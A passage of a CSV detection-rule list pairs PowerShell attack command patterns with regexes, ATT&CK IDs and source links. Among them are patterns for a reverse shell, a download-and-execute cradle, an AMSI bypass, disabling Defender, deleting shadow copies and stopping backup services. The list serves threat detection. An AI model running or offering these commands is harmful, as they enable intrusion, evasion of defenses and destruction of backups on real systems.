env:USERNAME*",".{0,1000}gci\senv\:USERNAME.{0,1000}","greyware_tool_keyword","powershell","alternative to whoami","T1033 ","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","3","6","N/A","N/A","N/A","N/A" "*gci -h C:\pagefile.sys*",".{0,1000}gci\s\-h\sC\:\\pagefile\.sys.{0,1000}","greyware_tool_keyword","powershell","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*Get-ADComputer -Filter {TrustedForDelegation -eq $True}*","Get\-ADComputer\s\-Filter\s\{TrustedForDelegation\s\-eq\s\$True\}","greyware_tool_keyword","powershell","AD Module Enumerate computers with Unconstrained Delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Get-ADGroup -Filter *Name -like *admin*","Get\-ADGroup\s\-Filter\s.{0,1000}Name\s\-like\s.{0,1000}admin.{0,1000}","greyware_tool_keyword","powershell","AD Module Search for a particular string in attributes (admin)","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Get-ADObject -Filter {msDS-AllowedToDelegateTo * -Properties msDS-AllowedToDelegateTo*","Get\-ADObject\s\-Filter\s\{msDS\-AllowedToDelegateTo\s.{0,1000}\s\-Properties\smsDS\-AllowedToDelegateTo.{0,1000}","greyware_tool_keyword","powershell","AD Module Enumerate principals with Constrained Delegation enabled","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Get-ADObject -SearchBase *CN=Shadow Principal Configuration*CN=Services* (Get-ADRootDSE).configurationNamingContext) | select 
*msDS-ShadowPrincipalSid*","Get\-ADObject\s\-SearchBase\s.{0,1000}CN\=Shadow\sPrincipal\sConfiguration.{0,1000}CN\=Services.{0,1000}\s\(Get\-ADRootDSE\)\.configurationNamingContext\)\s\|\sselect\s.{0,1000}msDS\-ShadowPrincipalSid.{0,1000}","greyware_tool_keyword","powershell","Enumerate shadow security principals mapped to a high priv group","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth*","Get\-ADUser\s\-Filter\s\{DoesNotRequirePreAuth\s\-eq\s\$True\}\s\-Properties\sDoesNotRequirePreAuth","greyware_tool_keyword","powershell","AD module Enumerate users","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Get-ADUser -Filter {TrustedForDelegation -eq $True}*","Get\-ADUser\s\-Filter\s\{TrustedForDelegation\s\-eq\s\$True\}","greyware_tool_keyword","powershell","AD Module Enumerate computers with Unconstrained Delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Get-AppLockerPolicy -Effective *",".{0,1000}Get\-AppLockerPolicy\s\-Effective\s.{0,1000}","greyware_tool_keyword","powershell","AppLocker Get AppLocker policy","T1592","TA0043","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","greyware tool - risks of False positive !","7","8","N/A","N/A","N/A","N/A" "*Get-DhcpServerv4Scope | Set-DhcpServerv4OptionValue -DnsServer 
*",".{0,1000}Get\-DhcpServerv4Scope\s\|\sSet\-DhcpServerv4OptionValue\s\-DnsServer\s.{0,1000}","greyware_tool_keyword","powershell","set the DNS server configuration","T1557 - T1584","TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*Get-DomainComputer -TrustedToAuth*","Get\-DomainComputer\s\-TrustedToAuth","greyware_tool_keyword","powershell","AD Module Enumerate principals with Constrained Delegation enabled","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Get-DomainUser -KerberosPreuthNotRequired -Verbose*",".{0,1000}Get\-DomainUser\s\-KerberosPreuthNotRequired\s\-Verbose.{0,1000}","greyware_tool_keyword","powershell","Powerview Enumerate users","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Get-GPO -All*","Get\-GPO\s\-All","greyware_tool_keyword","powershell","AD Module GroupPolicy - List of GPO in the domain","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Get-LoggedonLocal -ComputerName *",".{0,1000}Get\-LoggedonLocal\s\-ComputerName\s.{0,1000}","greyware_tool_keyword","powershell","PowerView get Locally logged users on a machine","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Get-MpComputerStatus*",".{0,1000}Get\-MpComputerStatus.{0,1000}","greyware_tool_keyword","powershell","Gets the status of antimalware software on the 
computer.","T1063","TA0005 - TA0007","N/A","N/A","Discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Get-MpPreference | Select-Object -ExpandProperty ExclusionPath*",".{0,1000}Get\-MpPreference\s\|\sSelect\-Object\s\-ExpandProperty\sExclusionPath.{0,1000}","greyware_tool_keyword","powershell","get defender AV exclusions","T1059.003 - T1202 - T1212","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","4","8","N/A","N/A","N/A","N/A" "*Get-NetGroup -FullData*","Get\-NetGroup\s\-FullData.{0,1000}","greyware_tool_keyword","powershell","Find groups in the current domain (PowerView)","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Get-NetGroupMember -GroupName *DNSAdmins*",".{0,1000}Get\-NetGroupMember\s\-GroupName\s.{0,1000}DNSAdmins.{0,1000}","greyware_tool_keyword","powershell","the command is used to discover the members of a specific domain group DNSAdmins which can provide an adversary with valuable information about the target environment. 
The knowledge of group members can be exploited by attackers to identify potential targets for privilege escalation or Lateral Movement within the network.","T1069.001","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","greyware tool - risks of False positive !","7","8","N/A","N/A","N/A","N/A" "*Get-NetUser -SPN*",".{0,1000}Get\-NetUser\s\-SPN.{0,1000}","greyware_tool_keyword","powershell","PowerView Find users with SPN","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Get-WmiObject Win32_ShadowCopy | Remove-WmiObject*",".{0,1000}Get\-WmiObject\sWin32_ShadowCopy\s\|\sRemove\-WmiObject.{0,1000}","greyware_tool_keyword","powershell","delete shadow copies","T1490 - T1562.002","TA0040 - TA0007","N/A","N/A","Defense Evasion","https://rexorvc0.com/2024/06/19/Akira-The-Old-New-Style-Crime/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Invoke-EnumerateLocalAdmin -Verbose*",".{0,1000}Invoke\-EnumerateLocalAdmin\s\-Verbose.{0,1000}","greyware_tool_keyword","powershell","Find local admins on the domain machines","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Invoke-UserHunter -CheckAccess*",".{0,1000}Invoke\-UserHunter\s\-CheckAccess.{0,1000}","greyware_tool_keyword","powershell","Check local admin access for the current user where the targets are found","T1078.003 - T1046 - T1087.001","TA0002 - TA0007 - TA0040","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Invoke-WebRequest ifconfig.me/ip*Content.Trim()",".{0,1000}Invoke\-WebRequest\sifconfig\.me\/ip.{0,1000}Content\.Trim\(\)","greyware_tool_keyword","powershell","C2 server to connect 
to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","47","15","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*ls env:USERNAME*",".{0,1000}ls\senv\:USERNAME.{0,1000}","greyware_tool_keyword","powershell","alternative to whoami","T1033 ","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","3","6","N/A","N/A","N/A","N/A" "*New-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist"" -Name * -Value 0 -PropertyType Dword*",".{0,1000}New\-ItemProperty\s\-Path\s\""HKLM\:\\Software\\Microsoft\\Windows\sNT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\""\s\-Name\s.{0,1000}\s\-Value\s0\s\-PropertyType\sDword.{0,1000}","greyware_tool_keyword","powershell","hiding a user from the login screen by modifying a specific registry key","T1112 - T1564.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*New-NetFirewallRule * -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22*",".{0,1000}New\-NetFirewallRule\s.{0,1000}\s\-Enabled\sTrue\s\-Direction\sInbound\s\-Protocol\sTCP\s\-Action\sAllow\s\-LocalPort\s22.{0,1000}","greyware_tool_keyword","powershell","allowing SSH incoming connections (critical on DC)","T1021.004 - T1133 - T1078.003","TA0008 - TA0005","N/A","N/A","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*New-Object System.Net.Sockets.TCPClient(*$stream = $client.GetStream()*[byte[]]$bytes = 0..65535*",".{0,1000}New\-Object\sSystem\.Net\.Sockets\.TCPClient\(.{0,1000}\$stream\s\=\s\$client\.GetStream\(\).{0,1000}\[byte\[\]\]\$bytes\s\=\s0\.\.65535.{0,1000}","greyware_tool_keyword","powershell","Powershell reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - 
TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z" "*powershell ?encodedcommand $env:PSExecutionPolicyPreference=""bypass""*",".{0,1000}powershell\s?encodedcommand\s\$env\:PSExecutionPolicyPreference\=\""bypass\"".{0,1000}","greyware_tool_keyword","powershell","Execution Policy Bypass evasion","T1059.001 - T1202 - T1480","TA0005 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*powershell -c *\windows\system32\inetsrv\appcmd.exe list apppool /@t:*",".{0,1000}powershell\s\-c\s.{0,1000}\\windows\\system32\\inetsrv\\appcmd\.exe\slist\sapppool\s\/\@t\:.{0,1000}","greyware_tool_keyword","powershell","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","Checking For Hidden Credentials With Appcmd.exe","10","10","2773","295","2024-08-29T22:58:18Z","2023-09-08T15:36:00Z" "*powershell New-ItemProperty -Path *HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender* -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force*",".{0,1000}powershell\sNew\-ItemProperty\s\-Path\s.{0,1000}HKLM\:\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender.{0,1000}\s\-Name\sDisableAntiSpyware\s\-Value\s1\s\-PropertyType\sDWORD\s\-Force.{0,1000}","greyware_tool_keyword","powershell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. 
disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*powershell Uninstall-WindowsFeature -Name Windows-Defender*",".{0,1000}powershell\sUninstall\-WindowsFeature\s\-Name\sWindows\-Defender.{0,1000}","greyware_tool_keyword","powershell","uninstalls Windows Defender","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*powershell*Uninstall-WindowsFeature -Name Windows-Defender-GUI*",".{0,1000}powershell.{0,1000}Uninstall\-WindowsFeature\s\-Name\sWindows\-Defender\-GUI.{0,1000}","greyware_tool_keyword","powershell","Windows Defender tampering technique ","T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*Powershell.exe -windowstyle hidden -nop -ExecutionPolicy Bypass -Commmand *C:\Users\*\AppData\Roaming\*",".{0,1000}Powershell\.exe\s\s\-windowstyle\shidden\s\-nop\s\-ExecutionPolicy\sBypass\s\s\-Commmand\s.{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\.{0,1000}","greyware_tool_keyword","powershell","Adversaries may attempt to execute powershell script from known accessible location","T1059.001 - T1036 - T1216","TA0002 - TA0006","N/A","N/A","Exploitation tool","N/A","1","0","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" "*powershell.exe curl http://[0-9]{1,3}*",".{0,1000}powershell.+curl\s+http:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}(\/|\:).{0,1000}","greyware_tool_keyword","powershell","downloading from IP without domain 
name","T1105","TA0009","N/A","N/A","Collection","https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html","1","0","N/A","only the regex part matters","6","10","N/A","N/A","N/A","N/A" "*powershell.exe -exec bypass -noni -nop -w 1 -C*",".{0,1000}powershell\.exe\s\-exec\sbypass\s\-noni\s\-nop\s\-w\s1\s\-C.{0,1000}","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","High risk of false positive","N/A","10","8325","1637","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*powershell.exe -exec bypass -noni -nop -w 1 -C*invoke_obfuscation*",".{0,1000}powershell\.exe\s\-exec\sbypass\s\-noni\s\-nop\s\-w\s1\s\-C.{0,1000}invoke_obfuscation.{0,1000}","greyware_tool_keyword","powershell","CrackMapExec behavior","T1021 - T1048 - T1077 - T1087 - T1090 - T1135 - T1210","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","N/A","10","8325","1637","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*powershell.exe Invoke-WebRequest http://[0-9]{1,3}*",".{0,1000}powershell\.exe\s+Invoke\-WebRequest\s+http:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}(\/|\:).{0,1000}","greyware_tool_keyword","powershell","downloading from IP without domain name","T1105","TA0009","N/A","N/A","Collection","https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html","1","0","N/A","only the regex part matters","6","10","N/A","N/A","N/A","N/A" "*powershell.exe iwr 
http://[0-9]{1,3}*",".{0,1000}powershell\.exe\s+iwr\s+http:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}(\/|\:).{0,1000}","greyware_tool_keyword","powershell","downloading from IP without domain name","T1105","TA0009","N/A","N/A","Collection","https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html","1","0","N/A","only the regex part matters","6","10","N/A","N/A","N/A","N/A" "*powershell.exe -noni -nop -w 1 -enc *",".{0,1000}powershell\.exe\s\-noni\s\-nop\s\-w\s1\s\-enc\s.{0,1000}","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","High risk of false positive","N/A","10","8325","1637","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc *",".{0,1000}powershell\.exe\s\-NoP\s\-NoL\s\-sta\s\-NonI\s\-W\sHidden\s\-Exec\sBypass\s\-Enc\s.{0,1000}","greyware_tool_keyword","powershell","CrackMapExec behavior","T1021 - T1048 - T1077 - T1087 - T1090 - T1135 - T1210","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","N/A","10","8325","1637","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://[0-9]{1,3}*",".{0,1000}powershell.+\s-nop\s-w\shidden\s-c\s\""IEX\s\(\(new\-object net\.webclient\)\.downloadstring\(\'http:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}(\/|\:).{0,1000}","greyware_tool_keyword","powershell","downloading from IP without domain name","T1105","TA0009","N/A","N/A","Collection","https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html","1","0","N/A","only the regex part 
matters","6","10","N/A","N/A","N/A","N/A" "*powershell.exe wget http://[0-9]{1,3}*",".{0,1000}powershell\.exe\s+wget\s+http:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}(\/|\:).{0,1000}","greyware_tool_keyword","powershell","downloading from IP without domain name","T1105","TA0009","N/A","N/A","Collection","https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html","1","0","N/A","only the regex part matters","6","10","N/A","N/A","N/A","N/A" "*reg delete * /v MRUList /f*",".{0,1000}reg\sdelete\s.{0,1000}\s\/v\sMRUList\s\/f.{0,1000}","greyware_tool_keyword","powershell","attempts to evade defenses or remove traces of activity by deleting MRUList registry keys","T1012 - T1070 - T1485 - T1146","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*Remove-ItemProperty -Path* -Name MRUList *",".{0,1000}Remove\-ItemProperty\s\-Path.{0,1000}\s\-Name\sMRUList\s.{0,1000}","greyware_tool_keyword","powershell","attempts to evade defenses or remove traces of activity by deleting MRUList registry keys","T1012 - T1070 - T1485 - T1146","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*root/SecurityCenter2* -ClassName AntiVirusProduct*",".{0,1000}root\/SecurityCenter2.{0,1000}\s\-ClassName\sAntiVirusProduct.{0,1000}","greyware_tool_keyword","powershell","list AV products with powershell","T1518.001 - T1082","TA0007 - TA0005","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","2","9","N/A","N/A","N/A","N/A" "*S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2')*",".{0,1000}S\`eT\-It\`em\s\(\s\'V\'\+\'aR\'\s\+\s\s\'IA\'\s\+\s\(\'blE\:1\'\+\'q2\'\).{0,1000}","greyware_tool_keyword","powershell","AMSI bypass obfuscation pattern","T1059.001 - T1562.001 - T1027.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*Set-ADObject -SamAccountName * -PropertyName scriptpath 
-PropertyValue *\*.exe*","Set\-ADObject\s\-SamAccountName\s.{0,1000}\s\-PropertyName\sscriptpath\s\-PropertyValue\s.{0,1000}\\.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","powershell","AD module Logon Script from remote IP","T1037.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*Set-Clipboard -Value ' '*",".{0,1000}Set\-Clipboard\s\-Value\s\'\s\'.{0,1000}","greyware_tool_keyword","powershell","Clearing the clipboard is a deliberate attempt to cover tracks and make the attack less detectable","T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-05-14-IOCs-for-DarkGate-activity.txt","1","0","N/A","N/A","10","2","161","7","2024-08-29T15:27:38Z","2023-08-29T22:32:38Z" "*Set-Clipboard -Value ''*",".{0,1000}Set\-Clipboard\s\-Value\s\'\'.{0,1000}","greyware_tool_keyword","powershell","Clearing the clipboard is a deliberate attempt to cover tracks and make the attack less detectable","T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-05-14-IOCs-for-DarkGate-activity.txt","1","0","N/A","N/A","10","2","161","7","2024-08-29T15:27:38Z","2023-08-29T22:32:38Z" "*Set-MPPreference -DisableIntrusionPreventionSystem $true*",".{0,1000}Set\-MPPreference\s\-DisableIntrusionPreventionSystem\s\$true.{0,1000}","greyware_tool_keyword","powershell","Disable IPS","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Set-MpPreference -DisableIOAVProtection $true*",".{0,1000}Set\-MpPreference\s\-DisableIOAVProtection\s\$true.{0,1000}","greyware_tool_keyword","powershell","Disable scanning all downloaded files and attachments","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - 
TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Set-MpPreference -DisableRealtimeMonitoring $true*",".{0,1000}Set\-MpPreference\s\-DisableRealtimeMonitoring\s\$true.{0,1000}","greyware_tool_keyword","powershell","Defense evasion technique. In order to avoid detection at any point of the kill chain, attackers use several ways to disable anti-virus, disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Set-MpPreference -DisableScriptScanning 1 *",".{0,1000}Set\-MpPreference\s\-DisableScriptScanning\s1\s.{0,1000}","greyware_tool_keyword","powershell","Disable AMSI (set to 0 to enable)","T1562.001 - T1562.002 - T1070.004","TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*Set-MpPreference -ExclusionExtension exe*",".{0,1000}Set-MpPreference\s\-ExclusionExtension\sexe.{0,1000}","greyware_tool_keyword","powershell","exclude exe file extensions from AV detections","T1562.001 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Akabanwa-toma/hacke/blob/aaebb5cb188eb3a17bebfedfbde6b354e5522b92/installer.bat#L29C21-L29C63","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A" "*Set-Service -Name sshd -StartupType 'Automatic'*",".{0,1000}Set\-Service\s\-Name\ssshd\s\-StartupType\s\'Automatic\'.{0,1000}","greyware_tool_keyword","powershell","openssh server is used (critical on DC - must not be installed)","T1021.004 - T1133 - T1078.003","TA0008 - TA0005","N/A","N/A","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Start-Service sshd*",".{0,1000}Start\-Service\ssshd.{0,1000}","greyware_tool_keyword","powershell","openssh server is used (critical on DC - must not be installed)","T1021.004 - T1133 - T1078.003","TA0008 - 
TA0005","N/A","N/A","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Stop-Process -Name ""Sophos *",".{0,1000}Stop\-Process\s\-Name\s\""Sophos\s.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name ""SQL Backups""*",".{0,1000}Stop\-Process\s\-Name\s\""SQL\sBackups\"".{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name ""SQLsafe Backup Service""*",".{0,1000}Stop\-Process\s\-Name\s\""SQLsafe\sBackup\sService\"".{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name ""storagecraft imagemanager*""",".{0,1000}Stop\-Process\s\-Name\s\""storagecraft\simagemanager.{0,1000}\""","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name ""Symantec System 
Recovery""*",".{0,1000}Stop\-Process\s\-Name\s\""Symantec\sSystem\sRecovery\"".{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name ""Veeam Backup Catalog Data Service""*",".{0,1000}Stop\-Process\s\-Name\s\""Veeam\sBackup\sCatalog\sData\sService\"".{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name ""Zoolz 2 Service""*",".{0,1000}Stop\-Process\s\-Name\s\""Zoolz\s2\sService\"".{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name acronisagent*",".{0,1000}Stop\-Process\s\-Name\sacronisagent.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 